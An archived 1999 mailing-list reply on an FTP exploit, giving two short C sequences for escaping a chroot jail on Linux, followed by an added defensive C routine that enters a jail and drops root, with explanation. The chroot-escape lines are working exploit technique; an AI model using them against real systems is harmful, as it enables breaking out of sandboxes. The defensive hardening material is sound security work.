Re: another ftp exploit (fwd)

From: Artem Malyshev (artemat_private)
Date: Fri Mar 26 1999 - 04:08:25 PST

    > /* To break chroot we have to...
    >
    >    fd = open ( ".", O_RDONLY );
    >    mkdir ( "hax0r", 0666 );
    >    chroot ( "hax0r" );
    >    fchdir ( fd );
    >    for ( i = 0; i < 254; i++ )
    >        chdir ( ".." );
    >    chroot ( "." );
    >
    > */
    
    Too complex for standard linux
    All we have to do to break chroot is:
    
     mkdir("/sh");   // we already have string "/sh" in memory as a part of
    		 // "/bin/sh"
     chroot("/sh");
     chroot("../../../../../../../../../"); // a number of "../" here,
    					// I used 0x10
    
    The last string can be built on the stack with a simple loop
    Tested on linux 2.2.1
    
     -am
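
Both sequences in this message call chroot() again from inside the jail, which only a process that is still root (CAP_SYS_CHROOT) can do. The following is an added example, not code from the post: a jail entry routine that puts the working directory inside the new root and then drops root irreversibly. The function name enter_jail, the path /var/empty and uid/gid 65534 are assumptions chosen for illustration.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1 /* exposes chroot() and setgroups() on glibc */
#endif
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Enter `jail` and permanently give up root. Returns 0 or a negative errno. */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    /* A second chroot() from inside the jail needs root, so refuse to
     * finish with uid 0 or gid 0. */
    if (jail == NULL || uid == 0 || gid == 0)
        return -EINVAL;

    /* chroot() does not move the working directory: chdir first so the
     * cwd is inside the new root, then re-anchor it at "/". */
    if (chdir(jail) != 0) return -errno;
    if (chroot(".") != 0) return -errno;
    if (chdir("/") != 0)  return -errno;

    /* Drop supplementary groups, then gid, then uid. After setuid() the
     * process may no longer change its groups, so the order matters. */
    if (setgroups(0, NULL) != 0) return -errno;
    if (setgid(gid) != 0)        return -errno;
    if (setuid(uid) != 0)        return -errno;

    /* Verify the drop cannot be undone and that chroot() is now refused. */
    if (setuid(0) == 0 || getuid() != uid || geteuid() != uid)
        return -EPERM;
    if (chroot("/") == 0)
        return -EPERM;
    return 0;
}

int main(int argc, char **argv)
{
    /* Constructed defaults: the jail path and uid/gid 65534 are placeholders. */
    const char *jail = argc > 1 ? argv[1] : "/var/empty";
    int rc = enter_jail(jail, 65534, 65534);
    if (rc != 0) { fprintf(stderr, "enter_jail: error %d\n", -rc); return 1; }
    puts("jailed and unprivileged");
    return 0;
}
```

Directory file descriptors opened before the chroot() call should also be closed before untrusted code runs, since the quoted variant relies on fchdir() to such a descriptor.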
    


